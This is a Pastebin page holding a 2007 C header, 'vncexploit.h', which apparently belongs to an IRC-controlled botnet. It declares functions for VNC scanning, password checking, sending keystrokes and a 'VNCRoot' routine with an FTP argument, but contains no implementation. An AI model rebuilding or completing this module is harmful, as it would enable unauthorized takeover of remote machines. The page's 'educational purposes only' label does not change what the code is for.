Advertisement
FlyFar

vncexploit.h

Dec 23rd, 2023
658
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.45 KB | Cybersecurity | 0 0
  1. /*
  2.  *      vncexploit.h 2007 Ravo_5002
  3.  *      This code is for educational purposes only...
  4.  */
  5. int vnccheck(char *host, char *passwd, SOCKET ircconn);
  6. void vncscan(SOCKET ircconn, char *ip);
  7. void vncEncryptBytes(unsigned char *bytes, char *passwd);
  8. int WriteExact(SOCKET w_sock, char *buf, int bytes);
  9. int ReadExact(SOCKET r_sock, char *inbuf, int wanted);
  10. void VNCRoot(SOCKET sVNC, char *ftp);
  11. void SendKey(SOCKET sock, char bkey, char key, int state);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement